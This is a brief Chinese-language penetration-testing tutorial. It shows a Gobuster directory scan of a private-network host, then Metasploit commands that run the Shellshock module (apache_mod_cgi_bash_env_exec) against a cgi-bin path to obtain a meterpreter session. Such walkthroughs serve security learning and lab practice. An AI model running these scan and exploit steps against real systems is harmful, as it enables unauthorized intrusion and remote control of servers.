Gobuster 是一個用於網站目錄和文件掃描的開源安全工具。通常用於測試網站的安全性,特別是尋找隱藏的頁面、目錄或文件,以檢查是否存在潛在的安全漏洞或敏感信息。
安裝 Gobuster 工具sudo apt install gobuster
掃描目標網站gobuster dir –-url http://192.168.0.24/ –-wordlist /usr/share/wordlists/dirb/common.txt
dir
:使用目錄掃描的模式。--url
:設定要掃描的目標網站URL,即 http://192.168.0.24/。--wordlist
:設定字典檔的路徑,Gobuster 會使用這個字典來進行字典攻擊。找可疑的漏洞
如果掃出了一個 cgi-bin 資料夾,可以聯想到一個弱點 shellshock,可以用 metasploit 工具來爆破看看。msfconsole
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 192.168.0.24
set RPORT 80
set TARGETURI /cgi-bin/keygen
出現 meterpreter > 即破解成功,可以再作後續的利用。